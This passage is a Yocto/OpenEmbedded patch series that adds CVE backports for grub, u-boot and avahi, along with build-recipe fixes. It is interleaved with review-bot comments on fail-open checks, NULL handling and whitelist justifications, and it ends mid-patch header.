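Review bot: `grub_efi_secure_boot()` fails open: any failure to read `SecureBoot` or `SetupMode` reaches `out` with `ret` still 0, and `grub_dl_load_file()` then permits the module load. `datasize` is also never initialised and is tested before the returned pointer, so if `grub_efi_get_variable()` returns NULL without writing it (its body is outside the hunk), the condition reads an indeterminate value. I would write `grub_size_t datasize = 0;` and `if (!secure_boot || datasize != 1)`, and likewise for `setup_mode`. A comment at `out:` should state that an unreadable variable is deliberately treated as Secure Boot disabled, so the policy choice is visible to the next reader.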
diff --git a/meta/recipes-bsp/grub/grub2.inc b/meta/recipes-bsp/grub/grub2.inc
index 4ec7d0b0fc..bea03f4fc1 100644
--- a/meta/recipes-bsp/grub/grub2.inc
+++ b/meta/recipes-bsp/grub/grub2.inc
@@ -13,6 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
CVE_PRODUCT = "grub2"
+# Applies only to RHEL
+CVE_CHECK_WHITELIST += "CVE-2019-14865"
+# Applies only to SUSE
+CVE_CHECK_WHITELIST += "CVE-2021-46705"
+
SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \
file://autogen.sh-exclude-pc.patch \
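Review bot: The two `CVE_CHECK_WHITELIST` entries are justified only by "Applies only to RHEL" and "Applies only to SUSE", which a later auditor cannot verify from the recipe. A whitelist entry silences the CVE check for every build that uses this include, so each comment should name the vendor-specific component and point at the advisory. For example: `# CVE-2019-14865: affects only <RHEL-specific component>, not built by this recipe; see <advisory URL>`.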
@@ -27,7 +32,86 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://script-Remove-unused-fields-from-grub_script_functio.patch \
file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \
file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \
-"
+ file://determinism.patch \
+ file://no-insmod-on-sb.patch \
+ file://CVE-2020-14372_1.patch \
+ file://CVE-2020-14372_2.patch \
+ file://CVE-2020-14372_3.patch \
+ file://CVE-2020-14372_4.patch \
+ file://CVE-2020-14372_5.patch \
+ file://CVE-2020-14372.patch \
+ file://CVE-2020-27779.patch \
+ file://CVE-2020-27779_2.patch \
+ file://CVE-2020-27779_3.patch \
+ file://CVE-2020-27779_4.patch \
+ file://CVE-2020-27779_5.patch \
+ file://CVE-2020-27779_6.patch \
+ file://CVE-2020-27779_7.patch \
+ file://CVE-2020-25632.patch \
+ file://CVE-2020-25647.patch \
+ file://0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch \
+ file://0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch \
+ file://0003-net-tftp-Fix-dangling-memory-pointer.patch \
+ file://0004-kern-parser-Fix-resource-leak-if-argc-0.patch \
+ file://0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch \
+ file://0006-kern-efi-Fix-memory-leak-on-failure.patch \
+ file://0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch \
+ file://0008-gnulib-regexec-Resolve-unused-variable.patch \
+ file://0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch \
+ file://0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch \
+ file://0011-gnulib-regexec-Fix-possible-null-dereference.patch \
+ file://0012-gnulib-regcomp-Fix-uninitialized-re_token.patch \
+ file://0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch \
+ file://0014-zstd-Initialize-seq_t-structure-fully.patch \
+ file://0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch \
+ file://0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch \
+ file://0017-disk-ldm-If-failed-then-free-vg-variable-too.patch \
+ file://0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch \
+ file://0019-disk-cryptodisk-Fix-potential-integer-overflow.patch \
+ file://0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch \
+ file://0021-zfs-Fix-possible-negative-shift-operation.patch \
+ file://0022-zfs-Fix-resource-leaks-while-constructing-path.patch \
+ file://0023-zfs-Fix-possible-integer-overflows.patch \
+ file://0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch \
+ file://0025-affs-Fix-memory-leaks.patch \
+ file://0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch \
+ file://0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch \
+ file://0028-syslinux-Fix-memory-leak-while-parsing.patch \
+ file://0029-normal-completion-Fix-leaking-of-memory-when-process.patch \
+ file://0030-commands-hashsum-Fix-a-memory-leak.patch \
+ file://0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch \
+ file://0032-video-fb-fbfill-Fix-potential-integer-overflow.patch \
+ file://0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch \
+ file://0034-video-fb-video_fb-Fix-possible-integer-overflow.patch \
+ file://0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch \
+ file://0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch \
+ file://0037-loader-bsd-Check-for-NULL-arg-up-front.patch \
+ file://0038-loader-xnu-Fix-memory-leak.patch \
+ file://0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch \
+ file://0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch \
+ file://0041-util-grub-install-Fix-NULL-pointer-dereferences.patch \
+ file://0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch \
+ file://0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch \
+ file://0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch \
+ file://0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch \
+ file://0046-script-execute-Avoid-crash-when-using-outside-a-func.patch \
+ file://CVE-2021-3981.patch \
+ file://CVE-2021-3695.patch \
+ file://CVE-2021-3696.patch \
+ file://CVE-2021-3697.patch \
+ file://CVE-2022-28733.patch \
+ file://CVE-2022-28734.patch \
+ file://CVE-2022-28736.patch \
+ file://CVE-2022-28735.patch \
+ file://font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch \
+ file://CVE-2022-2601.patch \
+ file://CVE-2022-3775.patch \
+ file://CVE-2020-27749.patch \
+ file://CVE-2021-20225.patch \
+ file://CVE-2021-20233.patch \
+ file://CVE-2023-4692.patch \
+ file://CVE-2023-4693.patch \
+ "
SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934"
SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea"
@@ -46,6 +130,8 @@ GRUBPLATFORM ??= "pc"
inherit autotools gettext texinfo pkgconfig
+CFLAGS_remove = "-O2"
+
EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \
--disable-grub-mkfont \
--program-prefix="" \
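Review bot: `CFLAGS_remove = "-O2"` is added without a comment, so the recipe does not record why the optimisation level is dropped or what level grub is then built with. It is worth confirming that this does not weaken hardening for the grub utilities built with the same flags, since `-D_FORTIFY_SOURCE` only takes effect when optimisation is enabled. A one-line comment above the assignment, giving the reason from the originating commit, would settle both questions.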
diff --git a/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
new file mode 100644
index 0000000000..47c7ec4170
--- /dev/null
+++ b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
@@ -0,0 +1,36 @@
+From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Wed, 11 Nov 2020 22:58:55 -0800
+Subject: [PATCH] Fix cross compilation using autoconf detected AR
+
+currently its using 'ar' program from build host, which is not expected,
+we need to respect AR passed in environment
+
+Upstream-Status: Pending
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ configure.in | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/configure.in b/configure.in
+index 4ddbe8b..b7c3c31 100644
+--- a/configure.in
++++ b/configure.in
+@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog,
+ ])
+
+ dnl Checks for programs.
++m4_ifndef([AC_PROG_AR],[dnl
++ AN_MAKEVAR([AR], [AC_PROG_AR])
++ AN_PROGRAM([ar], [AC_PROG_AR])
++ AC_DEFUN([AC_PROG_AR],
++ [AC_CHECK_TOOL(AR, ar, :)])
++])
++AC_PROG_AR
+ AC_PROG_CC
+ AC_PROG_GCC_TRADITIONAL
+ dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE
+--
+2.29.2
+
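Review bot: The fallback `AC_CHECK_TOOL(AR, ar, :)` sets `AR` to `:` when no archiver is found, so configure still succeeds and every archive step becomes a silent no-op. The failure then only surfaces later, as a missing library at link time. Failing in configure is clearer; after `AC_PROG_AR` add `if test "x$AR" = "x:"; then AC_MSG_ERROR([no ar found; set AR in the environment]); fi`.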
diff --git a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
index 4129237c59..54c431eeb3 100644
--- a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
+++ b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
@@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \
file://lrzsz-check-locale.h.patch \
file://cve-2018-10195.patch \
file://include.patch \
+ file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \
"
SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4"
diff --git a/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
index 56f2d4b915..972d8de17d 100644
--- a/meta/recipes-bsp/opensbi/opensbi_0.6.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
@@ -1,5 +1,6 @@
SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)"
DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration."
+HOMEPAGE = "https://github.com/riscv/opensbi"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5"
@@ -8,7 +9,7 @@ require opensbi-payloads.inc
inherit autotools-brokensep deploy
SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862"
-SRC_URI = "git://github.com/riscv/opensbi.git \
+SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
"
diff --git a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
index cac09101c4..fa3b993788 100644
--- a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
+++ b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
@@ -19,9 +19,12 @@ PACKAGECONFIG[manpages] = "--enable-doc, --disable-doc, libxslt-native xmlto-nat
RDEPENDS_${PN} = "grep bash"
+EXTRA_OECONF = "--libdir=${nonarch_libdir}"
+
do_configure_prepend () {
( cd ${S}; autoreconf -f -i -s )
}
-FILES_${PN} += "${libdir}/${BPN}/*"
+FILES_${PN} += "${nonarch_libdir}/${BPN}/*"
FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging"
+FILES_${PN}-dev += "${nonarch_libdir}/pkgconfig/pm-utils.pc"
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
new file mode 100644
index 0000000000..d784452b44
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
@@ -0,0 +1,98 @@
+From 67acad3db71bb372458fbb8a77749f5eb88aa324 Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:01 -0600
+Subject: [PATCH] image: Check hash-nodes when checking configurations
+
+It is currently possible to use a different configuration's signature and
+thus bypass the configuration check. Make sure that the configuration node
+that was hashed matches the one being checked, to catch this problem.
+
+Also add a proper function comment to fit_config_check_sig() and make it
+static.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/67acad3db71bb372458fbb8a77749f5eb88aa324]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/image-sig.c | 36 +++++++++++++++++++++++++++++++++---
+ 1 file changed, 33 insertions(+), 3 deletions(-)
+
+diff --git a/common/image-sig.c b/common/image-sig.c
+index 13ccd50bc5..03143a4040 100644
+--- a/common/image-sig.c
++++ b/common/image-sig.c
+@@ -359,20 +359,39 @@ int fit_image_verify_required_sigs(const void *fit, int image_noffset,
+ return 0;
+ }
+
+-int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+- char **err_msgp)
++/**
++ * fit_config_check_sig() - Check the signature of a config
++ *
++ * @fit: FIT to check
++ * @noffset: Offset of configuration node (e.g. /configurations/conf-1)
++ * @required_keynode: Offset in the control FDT of the required key node,
++ * if any. If this is given, then the configuration wil not
++ * pass verification unless that key is used. If this is
++ * -1 then any signature will do.
++ * @conf_noffset: Offset of the configuration subnode being checked (e.g.
++ * /configurations/conf-1/kernel)
++ * @err_msgp: In the event of an error, this will be pointed to a
++ * help error string to display to the user.
++ * @return 0 if all verified ok, <0 on error
++ */
++static int fit_config_check_sig(const void *fit, int noffset,
++ int required_keynode, int conf_noffset,
++ char **err_msgp)
+ {
+ char * const exc_prop[] = {"data"};
+ const char *prop, *end, *name;
+ struct image_sign_info info;
+ const uint32_t *strings;
++ const char *config_name;
+ uint8_t *fit_value;
+ int fit_value_len;
++ bool found_config;
+ int max_regions;
+ int i, prop_len;
+ char path[200];
+ int count;
+
++ config_name = fit_get_name(fit, conf_noffset, NULL);
+ debug("%s: fdt=%p, conf='%s', sig='%s'\n", __func__, gd_fdt_blob(),
+ fit_get_name(fit, noffset, NULL),
+ fit_get_name(gd_fdt_blob(), required_keynode, NULL));
+@@ -413,9 +432,20 @@ int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+ char *node_inc[count];
+
+ debug("Hash nodes (%d):\n", count);
++ found_config = false;
+ for (name = prop, i = 0; name < end; name += strlen(name) + 1, i++) {
+ debug(" '%s'\n", name);
+ node_inc[i] = (char *)name;
++ if (!strncmp(FIT_CONFS_PATH, name, strlen(FIT_CONFS_PATH)) &&
++ name[sizeof(FIT_CONFS_PATH) - 1] == '/' &&
++ !strcmp(name + sizeof(FIT_CONFS_PATH), config_name)) {
++ debug(" (found config node %s)", config_name);
++ found_config = true;
++ }
++ }
++ if (!found_config) {
++ *err_msgp = "Selected config not in hashed nodes";
++ return -1;
+ }
+
+ /*
+@@ -483,7 +513,7 @@ static int fit_config_verify_sig(const void *fit, int conf_noffset,
+ if (!strncmp(name, FIT_SIG_NODENAME,
+ strlen(FIT_SIG_NODENAME))) {
+ ret = fit_config_check_sig(fit, noffset, sig_offset,
+- &err_msg);
++ conf_noffset, &err_msg);
+ if (ret) {
+ puts("- ");
+ } else {
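Review bot: `config_name` comes from `fit_get_name(fit, conf_noffset, NULL)` and is passed straight to `strcmp()` in the hash-node loop, so a failed lookup that returns NULL would be dereferenced inside the signature check instead of rejecting the image. A guard right after the assignment keeps that case on the error path: `if (!config_name) { *err_msgp = "Cannot read config name"; return -1; }`. The new kernel-doc also disagrees with the call site: the caller passes as `noffset` the subnode whose name matches `FIT_SIG_NODENAME`, and `conf_noffset` is the node whose name is compared with the part of each hashed path after `FIT_CONFS_PATH`. `@noffset` should therefore describe the signature node and `@conf_noffset` the configuration node, and "wil" should read "will". The function body continues outside the nested hunks, and as this is a backport the change would need to go upstream first.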
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
new file mode 100644
index 0000000000..023f7eac0a
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
@@ -0,0 +1,52 @@
+From 8a9d03732e6d0f68107c80919096e7cf956dcb3d Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:02 -0600
+Subject: [PATCH] image: Load the correct configuration in fit_check_sign
+
+At present bootm_host_load_images() is passed the configuration that has
+been verified, but ignores it and just uses the default configuration.
+This may not be the same.
+
+Update this function to use the selected configuration.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/8a9d03732e6d0f68107c80919096e7cf956dcb3d]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/bootm.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/common/bootm.c b/common/bootm.c
+index 902c13880d..db4362a643 100644
+--- a/common/bootm.c
++++ b/common/bootm.c
+@@ -819,7 +819,8 @@ void __weak switch_to_non_secure_mode(void)
+ #else /* USE_HOSTCC */
+
+ #if defined(CONFIG_FIT_SIGNATURE)
+-static int bootm_host_load_image(const void *fit, int req_image_type)
++static int bootm_host_load_image(const void *fit, int req_image_type,
++ int cfg_noffset)
+ {
+ const char *fit_uname_config = NULL;
+ ulong data, len;
+@@ -831,6 +832,7 @@ static int bootm_host_load_image(const void *fit, int req_image_type)
+ void *load_buf;
+ int ret;
+
++ fit_uname_config = fdt_get_name(fit, cfg_noffset, NULL);
+ memset(&images, '\0', sizeof(images));
+ images.verify = 1;
+ noffset = fit_image_load(&images, (ulong)fit,
+@@ -878,7 +880,7 @@ int bootm_host_load_images(const void *fit, int cfg_noffset)
+ for (i = 0; i < ARRAY_SIZE(image_types); i++) {
+ int ret;
+
+- ret = bootm_host_load_image(fit, image_types[i]);
++ ret = bootm_host_load_image(fit, image_types[i], cfg_noffset);
+ if (!err && ret && ret != -ENOENT)
+ err = ret;
+ }
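Review bot: The result of `fit_uname_config = fdt_get_name(fit, cfg_noffset, NULL);` is used unchecked, and the variable's initial value of NULL is what, per the commit message, made the loader use the default configuration. If the name lookup fails, the function falls back to exactly the behaviour this fix removes and may load images from a configuration other than the verified one. Returning an error closes that path: `if (!fit_uname_config) return -EINVAL;`. The code should not be `-ENOENT`, which the caller in the last hunk deliberately ignores. The rest of `bootm_host_load_image` is outside the hunk.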
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
new file mode 100644
index 0000000000..b0a16efeaa
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
@@ -0,0 +1,114 @@
+From 5749faa3d6837d6dbaf2119fc3ec49a326690c8f Mon Sep 17 00:00:00 2001
+From: Tom Rini <trini@konsulko.com>
+Date: Tue, 21 Jan 2020 11:53:38 -0500
+Subject: [PATCH] cmd/gpt: Address error cases during gpt rename more correctly
+
+New analysis by the tool has shown that we have some cases where we
+weren't handling the error exit condition correctly. When we ran into
+the ENOMEM case we wouldn't exit the function and thus incorrect things
+could happen. Rework the unwinding such that we don't need a helper
+function now and free what we may have allocated.
+
+Fixes: 18030d04d25d ("GPT: fix memory leaks identified by Coverity")
+Reported-by: Coverity (CID: 275475, 275476)
+Cc: Alison Chaiken <alison@she-devel.com>
+Cc: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+Cc: Jordy <jordy@simplyhacker.com>
+Signed-off-by: Tom Rini <trini@konsulko.com>
+Reviewed-by: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+
+CVE: CVE-2020-8432
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/5749faa3d6837d6dbaf2119fc3ec49a326690c8f]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ cmd/gpt.c | 47 ++++++++++++-----------------------------------
+ 1 file changed, 12 insertions(+), 35 deletions(-)
+
+diff --git a/cmd/gpt.c b/cmd/gpt.c
+index 0c4349f4b2..964702bad4 100644
+--- a/cmd/gpt.c
++++ b/cmd/gpt.c
+@@ -633,21 +633,6 @@ static int do_disk_guid(struct blk_desc *dev_desc, char * const namestr)
+ }
+
+ #ifdef CONFIG_CMD_GPT_RENAME
+-/*
+- * There are 3 malloc() calls in set_gpt_info() and there is no info about which
+- * failed.
+- */
+-static void set_gpt_cleanup(char **str_disk_guid,
+- disk_partition_t **partitions)
+-{
+-#ifdef CONFIG_RANDOM_UUID
+- if (str_disk_guid)
+- free(str_disk_guid);
+-#endif
+- if (partitions)
+- free(partitions);
+-}
+-
+ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ char *name1, char *name2)
+ {
+@@ -655,7 +640,7 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ struct disk_part *curr;
+ disk_partition_t *new_partitions = NULL;
+ char disk_guid[UUID_STR_LEN + 1];
+- char *partitions_list, *str_disk_guid;
++ char *partitions_list, *str_disk_guid = NULL;
+ u8 part_count = 0;
+ int partlistlen, ret, numparts = 0, partnum, i = 1, ctr1 = 0, ctr2 = 0;
+
+@@ -697,14 +682,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ /* set_gpt_info allocates new_partitions and str_disk_guid */
+ ret = set_gpt_info(dev_desc, partitions_list, &str_disk_guid,
+ &new_partitions, &part_count);
+- if (ret < 0) {
+- del_gpt_info();
+- free(partitions_list);
+- if (ret == -ENOMEM)
+- set_gpt_cleanup(&str_disk_guid, &new_partitions);
+- else
+- goto out;
+- }
++ if (ret < 0)
++ goto out;
+
+ if (!strcmp(subcomm, "swap")) {
+ if ((strlen(name1) > PART_NAME_LEN) || (strlen(name2) > PART_NAME_LEN)) {
+@@ -766,14 +745,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ * Even though valid pointers are here passed into set_gpt_info(),
+ * it mallocs again, and there's no way to tell which failed.
+ */
+- if (ret < 0) {
+- del_gpt_info();
+- free(partitions_list);
+- if (ret == -ENOMEM)
+- set_gpt_cleanup(&str_disk_guid, &new_partitions);
+- else
+- goto out;
+- }
++ if (ret < 0)
++ goto out;
+
+ debug("Writing new partition table\n");
+ ret = gpt_restore(dev_desc, disk_guid, new_partitions, numparts);
+@@ -795,10 +768,14 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ }
+ printf("new partition table with %d partitions is:\n", numparts);
+ print_gpt_info();
+- del_gpt_info();
+ out:
+- free(new_partitions);
+- free(str_disk_guid);
++ del_gpt_info();
++#ifdef CONFIG_RANDOM_UUID
++ if (str_disk_guid)
++ free(str_disk_guid);
++#endif
++ if (new_partitions)
++ free(new_partitions);
+ free(partitions_list);
+ return ret;
+ }
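Review bot: At the `out:` label, `free(str_disk_guid)` is now compiled only under `CONFIG_RANDOM_UUID`, whereas the removed code freed it unconditionally. The context comment says `set_gpt_info` allocates `str_disk_guid`, so builds without that option may leak it on every exit path; this needs confirming against `set_gpt_info`, which is outside the hunk. Because the declaration now initialises the pointer to NULL, a plain `free(str_disk_guid);` without the `#ifdef` is safe in both configurations. The `if (ptr)` guards before `free()` are also unnecessary, since `free(NULL)` is a no-op.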
diff --git a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
index 613e3161fb..8234b86162 100644
--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
-SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https"
+SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-bsp/u-boot/u-boot-common.inc b/meta/recipes-bsp/u-boot/u-boot-common.inc
index 4a17894c49..91fe08966b 100644
--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,10 +14,13 @@ PE = "1"
# repo during parse
SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd"
-SRC_URI = "git://git.denx.de/u-boot.git \
+SRC_URI = "git://source.denx.de/u-boot/u-boot.git;protocol=https;branch=master \
file://remove-redundant-yyloc-global.patch \
+ file://CVE-2020-8432.patch \
+ file://CVE-2020-10648-1.patch \
+ file://CVE-2020-10648-2.patch \
"
-
+
S = "${WORKDIR}/git"
B = "${WORKDIR}/build"
do_configure[cleandirs] = "${B}"
diff --git a/meta/recipes-bsp/u-boot/u-boot-tools.inc b/meta/recipes-bsp/u-boot/u-boot-tools.inc
index 8ae290acc6..4ed936a70d 100644
--- a/meta/recipes-bsp/u-boot/u-boot-tools.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-tools.inc
@@ -23,6 +23,21 @@ SED_CONFIG_EFI_armeb = ''
SED_CONFIG_EFI_aarch64 = ''
do_compile () {
+ # Yes, this is crazy. If you build on a system with git < 2.14 from scratch, the tree will
+ # be marked as "dirty" and the version will include "-dirty", leading to a reproducibility problem.
+ # The issue is the inode count for Licnses/README changing due to do_populate_lic hardlinking a
+ # copy of the file. We avoid this by ensuring the index is updated with a "git diff" before the
+ # u-boot machinery tries to determine the version.
+ #
+ # build$ ../git/scripts/setlocalversion ../git
+ # ""
+ # build$ ln ../git/
+ # build$ ln ../git/README ../foo
+ # build$ ../git/scripts/setlocalversion ../git
+ # ""-dirty
+ # (i.e. creating a hardlink dirties the index)
+ cd ${S}; git diff; cd ${B}
+
oe_runmake -C ${S} sandbox_defconfig O=${B}
# Disable CONFIG_CMD_LICENSE, license.h is not used by tools and
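Review bot: The explanatory comment is hard to follow as written: the transcript contains a truncated command (`# build$ ln ../git/`), and `Licnses/README` looks like a typo for the licence file that do_populate_lic hardlinks. Since the workaround exists to keep the version string reproducible, the comment should name the exact file and say what the hardlink changes; dropping the stray line and fixing the path would be enough. The `git diff` output also lands in the task log on every build; `git diff > /dev/null` should keep the index refresh without the noise. `do_compile` continues outside the hunk.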
diff --git a/meta/recipes-bsp/v86d/v86d_0.1.10.bb b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
index a8df80fdd6..e614de0c48 100644
--- a/meta/recipes-bsp/v86d/v86d_0.1.10.bb
+++ b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
@@ -1,5 +1,6 @@
SUMMARY = "User support binary for the uvesafb kernel module"
HOMEPAGE = "https://tracker.debian.org/pkg/v86d"
+DESCRIPTION = "v86d provides a backend for kernel drivers that need to execute x86 BIOS code. The code is executed in a controlled environment and the results are passed back to the kernel via the netlink interface."
# the copyright info is at the bottom of README, expect break
LICENSE = "GPLv2"
diff --git a/meta/recipes-connectivity/avahi/avahi.inc b/meta/recipes-connectivity/avahi/avahi.inc
index 6acedb5412..e1dfc7a861 100644
--- a/meta/recipes-connectivity/avahi/avahi.inc
+++ b/meta/recipes-connectivity/avahi/avahi.inc
@@ -21,6 +21,16 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1 \
SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \
file://fix-CVE-2017-6519.patch \
+ file://CVE-2021-3468.patch \
+ file://CVE-2023-1981.patch \
+ file://CVE-2023-38469-1.patch \
+ file://CVE-2023-38469-2.patch \
+ file://CVE-2023-38470-1.patch \
+ file://CVE-2023-38470-2.patch \
+ file://CVE-2023-38471-1.patch \
+ file://CVE-2023-38471-2.patch \
+ file://CVE-2023-38472.patch \
+ file://CVE-2023-38473.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/meta/recipes-connectivity/avahi/avahi_0.7.bb b/meta/recipes-connectivity/avahi/avahi_0.7.bb
index f6e3afb24e..0df44bffbe 100644
--- a/meta/recipes-connectivity/avahi/avahi_0.7.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.7.bb
@@ -8,6 +8,9 @@ SRC_URI += "file://00avahi-autoipd \
inherit update-rc.d systemd useradd
+# Issue only affects Debian/SUSE, not us
+CVE_CHECK_WHITELIST += "CVE-2021-26720"
+
PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils"
LICENSE_libavahi-gobject = "LGPLv2.1+"
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
new file mode 100644
index 0000000000..638a1f6071
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
@@ -0,0 +1,42 @@
+From 447affe29991ee99c6b9732fc5f2c1048a611d3b Mon Sep 17 00:00:00 2001
+From: Riccardo Schirone <sirmy15@gmail.com>
+Date: Fri, 26 Mar 2021 11:50:24 +0100
